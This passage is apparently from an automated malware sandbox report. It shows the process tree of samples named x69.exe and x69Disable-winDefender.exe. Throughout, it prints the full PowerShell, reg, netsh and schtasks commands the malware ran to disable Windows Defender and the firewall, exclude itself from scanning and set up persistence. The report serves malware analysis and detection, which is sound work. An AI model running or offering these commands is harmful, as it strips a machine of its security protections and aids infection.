                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:3336
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                                                                                          5⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:5832
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell.exe -command "Set-MpPreference -DisableScriptScanning $true"
                                                                                          5⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:3916
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"
                                                                                          5⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:3064
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell.exe -command "Set-MpPreference -MAPSReporting 0"
                                                                                          5⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:400
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
                                                                                          5⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:4136
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"
                                                                                          5⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:3336
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"
                                                                                          5⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:4816
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"
                                                                                          5⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:5036
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell.exe -command "Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
                                                                                          5⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:4224
                                                                                          • C:\Windows\system32\reg.exe
                                                                                            "C:\Windows\system32\reg.exe" add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v DisableAntiSpyware /t REG_DWORD /d 1 /f
                                                                                            6⤵
                                                                                             PID:2712
                                                                                         • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                           powershell.exe -command "REG ADD ΓÇ£hklm\software\policies\microsoft\windows defenderΓÇ¥ /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
                                                                                           5⤵
                                                                                           • Command and Scripting Interpreter: PowerShell
                                                                                           • Suspicious use of AdjustPrivilegeToken
                                                                                           PID:4612
                                                                                           • C:\Windows\system32\reg.exe
                                                                                             "C:\Windows\system32\reg.exe" ADD ΓÇ£hklm\software\policies\microsoft\windows defenderΓÇ¥ /v DisableAntiSpyware /t REG_DWORD /d 1 /f
                                                                                             6⤵
                                                                                             PID:3244
                                                                                         • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                           powershell.exe -command "netsh advfirewall set allprofiles state off"
                                                                                           5⤵
                                                                                           • Command and Scripting Interpreter: PowerShell
                                                                                           • Suspicious use of AdjustPrivilegeToken
                                                                                           PID:4836
                                                                                           • C:\Windows\system32\netsh.exe
                                                                                             "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
                                                                                             6⤵
                                                                                             • Modifies Windows Firewall
                                                                                             • Event Triggered Execution: Netsh Helper DLL
                                                                                             PID:1876
                                                                                         • C:\Windows\system32\reg.exe
                                                                                           reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
                                                                                           5⤵
                                                                                           PID:1728
                                                                                         • C:\Windows\system32\reg.exe
                                                                                           reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
                                                                                           5⤵
                                                                                           • Modifies Windows Defender DisableAntiSpyware settings
                                                                                           PID:2560
                                                                                         • C:\Windows\system32\reg.exe
                                                                                           reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                                                                                           5⤵
                                                                                           PID:3592
                                                                                         • C:\Windows\system32\reg.exe
                                                                                           reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
                                                                                           5⤵
                                                                                           PID:3324
                                                                                         • C:\Windows\system32\reg.exe
                                                                                           reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                                                                                           5⤵
                                                                                           • Modifies Windows Defender Real-time Protection settings
                                                                                           PID:1236
                                                                                         • C:\Windows\system32\reg.exe
                                                                                           reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                                                                                           5⤵
                                                                                           • Modifies Windows Defender Real-time Protection settings
                                                                                           PID:5640
                                                                                         • C:\Windows\system32\reg.exe
                                                                                           reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                                                                                           5⤵
                                                                                           • Modifies Windows Defender Real-time Protection settings
                                                                                           PID:2244
                                                                                         • C:\Windows\system32\reg.exe
                                                                                           reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                                                                                           5⤵
                                                                                           • Modifies Windows Defender Real-time Protection settings
                                                                                           PID:4484
                                                                                         • C:\Windows\system32\reg.exe
                                                                                           reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                                                                                           5⤵
                                                                                           • Modifies Windows Defender Real-time Protection settings
                                                                                           PID:2720
                                                                                         • C:\Windows\system32\reg.exe
                                                                                           reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                                                                                           5⤵
                                                                                           PID:2292
                                                                                         • C:\Windows\system32\reg.exe
                                                                                           reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                                                                                           5⤵
                                                                                           PID:3368
                                                                                         • C:\Windows\system32\reg.exe
                                                                                           reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                                                                                           5⤵
                                                                                           PID:5132
                                                                                         • C:\Windows\system32\reg.exe
                                                                                           reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
                                                                                           5⤵
                                                                                           PID:3064
                                                                                         • C:\Windows\system32\reg.exe
                                                                                           reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                                           5⤵
                                                                                           PID:3708
                                                                                         • C:\Windows\system32\reg.exe
                                                                                           reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                                           5⤵
                                                                                           PID:4504
                                                                                         • C:\Windows\system32\schtasks.exe
                                                                                           schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                                                                                           5⤵
                                                                                           PID:2900
                                                                                         • C:\Windows\system32\schtasks.exe
                                                                                           schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                                                                                           5⤵
                                                                                           PID:940
                                                                                         • C:\Windows\system32\schtasks.exe
                                                                                           schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                                                                                           5⤵
                                                                                           PID:2916
                                                                                         • C:\Windows\system32\schtasks.exe
                                                                                           schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                                                                           5⤵
                                                                                           PID:3808
                                                                                         • C:\Windows\system32\schtasks.exe
                                                                                           schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                                                                           5⤵
                                                                                           PID:5148
                                                                                         • C:\Windows\system32\reg.exe
                                                                                           reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
                                                                                           5⤵
                                                                                           PID:4972
                                                                                         • C:\Windows\system32\reg.exe
                                                                                           reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
                                                                                           5⤵
                                                                                           PID:752
                                                                                         • C:\Windows\system32\reg.exe
                                                                                           reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                                                                                           5⤵
                                                                                           PID:3104
                                                                                         • C:\Windows\system32\reg.exe
                                                                                           reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                                                                                           5⤵
                                                                                           PID:5912
                                                                                         • C:\Windows\system32\reg.exe
                                                                                           reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                                                                                           5⤵
                                                                                           PID:1384
                                                                                         • C:\Windows\system32\reg.exe
                                                                                           reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                                                                                           5⤵
                                                                                           • Modifies Security services
                                                                                           PID:2016
                                                                                         • C:\Windows\system32\reg.exe
                                                                                           reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                                                                           5⤵
                                                                                           • Modifies Security services
                                                                                           PID:1084
                                                                                         • C:\Windows\system32\reg.exe
                                                                                           reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                                                                                           5⤵
                                                                                           • Modifies Security services
                                                                                           PID:4876
                                                                                         • C:\Windows\system32\reg.exe
                                                                                           reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                                                           5⤵
                                                                                           • Modifies Security services
                                                                                           PID:3852
                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                    reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                    5⤵
                                                                                                                                    • Modifies security service
                                                                                                                                    PID:516
                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69install.exe'
                                                                                                                                3⤵
                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                PID:4484
                                                                                                                              • C:\Windows\System32\schtasks.exe
                                                                                                                                "C:\Windows\System32\schtasks.exe" /Create /F /TN "x69install" /SC ONLOGON /TR "C:\Users\Admin\AppData\Roaming\x69install.exe" /RL HIGHEST
                                                                                                                                3⤵
                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                PID:3428
                                                                                                                              • C:\Users\Admin\AppData\Roaming\x69install.exe
                                                                                                                                "C:\Users\Admin\AppData\Roaming\x69install.exe"
                                                                                                                                3⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                PID:2916
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe
                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe
                                                                                                                                  4⤵
                                                                                                                                  • Checks computer location settings
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  PID:4648
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6dc706d6.bat" "
                                                                                                                                    5⤵
                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                    PID:4484
                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      6⤵
                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                      PID:1668
                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                              C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\x69.exe
                                                                                                                              2⤵
                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                              PID:684
                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                3⤵
                                                                                                                                 PID:1956
                                                                                                                                • C:\Users\Admin\AppData\Roaming\x69.exe
                                                                                                                                  C:\Users\Admin\AppData\Roaming\x69.exe
                                                                                                                                  3⤵
                                                                                                                                  • Checks computer location settings
                                                                                                                                  • Drops startup file
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Adds Run key to start application
                                                                                                                                  • Suspicious behavior: AddClipboardFormatListener
                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                  PID:4600
                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69.exe'
                                                                                                                                    4⤵
                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    PID:3244
                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x69.exe'
                                                                                                                                    4⤵
                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    PID:228
                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69.exe'
                                                                                                                                    4⤵
                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    PID:4604
                                                                                                                                  • C:\Windows\System32\schtasks.exe
                                                                                                                                    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "x69" /tr "C:\Users\Admin\AppData\Roaming\x69.exe"
                                                                                                                                    4⤵
                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                    PID:5556
                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe
                                                                                                                                2⤵
                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                PID:1368
                                                                                                                                • C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe
                                                                                                                                  C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe
                                                                                                                                  3⤵
                                                                                                                                  • Checks computer location settings
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                  PID:2236
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe
                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe
                                                                                                                                    4⤵
                                                                                                                                    • Checks computer location settings
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                    PID:2516
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7b925020.bat" "
                                                                                                                                      5⤵
                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                      PID:4392
                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                    "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8D4C.tmp\8D4D.tmp\8D4E.bat C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe"
                                                                                                                                    4⤵
                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                    PID:4980
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                                                                                                                      5⤵
                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:2116
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell.exe -command "Set-MpPreference -DisableBehaviorMonitoring $true"
                                                                                                                                      5⤵
                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:1404
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell.exe -command "Set-MpPreference -DisableBlockAtFirstSeen $true"
                                                                                                                                      5⤵
                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:3672
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell.exe -command "Set-MpPreference -DisableIOAVProtection $true"
                                                                                                                                      5⤵
                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:6096
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell.exe -command "Set-MpPreference -DisablePrivacyMode $true"
                                                                                                                                      5⤵
                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:3068
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"
                                                                                                                                      5⤵
                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:1220
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"
                                                                                                                                      5⤵
                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:5024
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                                                                                                                                      5⤵
                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:3100
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell.exe -command "Set-MpPreference -DisableScriptScanning $true"
                                                                                                                                      5⤵
                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:1048
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"
                                                                                                                                      5⤵
                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:2256
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell.exe -command "Set-MpPreference -MAPSReporting 0"
                                                                                                                                      5⤵
                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:3156
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
                                                                                                                                      5⤵
                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:6088
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"
                                                                                                                                      5⤵
                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:6112
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"
                                                                                                                                      5⤵
                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:5792
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"
                                                                                                                                      5⤵
                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:5724
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell.exe -command "Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
                                                                                                                                      5⤵
                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:1628
                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                        "C:\Windows\system32\reg.exe" add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v DisableAntiSpyware /t REG_DWORD /d 1 /f
                                                                                                                                        6⤵
                                                                                                                                          PID:4888
                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                         powershell.exe -command "REG ADD “hklm\software\policies\microsoft\windows defender” /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
                                                                                                                                        5⤵
                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                        PID:1460
                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                           "C:\Windows\system32\reg.exe" ADD “hklm\software\policies\microsoft\windows defender” /v DisableAntiSpyware /t REG_DWORD /d 1 /f
                                                                                                                                          6⤵
                                                                                                                                            PID:1928
                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          powershell.exe -command "netsh advfirewall set allprofiles state off"
                                                                                                                                          5⤵
                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                          PID:556
                                                                                                                                          • C:\Windows\system32\netsh.exe
                                                                                                                                            "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
                                                                                                                                            6⤵
                                                                                                                                            • Modifies Windows Firewall
                                                                                                                                            • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                            PID:3412
                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                          reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
                                                                                                                                          5⤵
                                                                                                                                          • Modifies Windows Defender Real-time Protection settings
                                                                                                                                          PID:428
                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
                                                                                                                                          5⤵
                                                                                                                                          • Modifies Windows Defender DisableAntiSpyware settings
                                                                                                                                          PID:3316
                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                                                                                                                                          5⤵
                                                                                                                                            PID:2980
                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
                                                                                                                                            5⤵
                                                                                                                                              PID:4492
                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                                                                                                                                              5⤵
                                                                                                                                              • Modifies Windows Defender Real-time Protection settings
                                                                                                                                              PID:3260
                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                                                                                                                                              5⤵
                                                                                                                                              • Modifies Windows Defender Real-time Protection settings
                                                                                                                                              PID:2684
                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                                                                                                                                              5⤵
                                                                                                                                              • Modifies Windows Defender Real-time Protection settings
                                                                                                                                              PID:4744
                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                                                                                                                                              5⤵
                                                                                                                                              • Modifies Windows Defender Real-time Protection settings
                                                                                                                                              PID:1588
                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                                                                                                                                              5⤵
                                                                                                                                              • Modifies Windows Defender Real-time Protection settings
                                                                                                                                              PID:440
                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                                                                                                                                              5⤵
                                                                                                                                                PID:996
                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                                                                                                                                                5⤵
                                                                                                                                                  PID:2712
                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                                                                                                                                                  5⤵
                                                                                                                                                    PID:4772
                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
                                                                                                                                                    5⤵
                                                                                                                                                      PID:948
                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                      reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
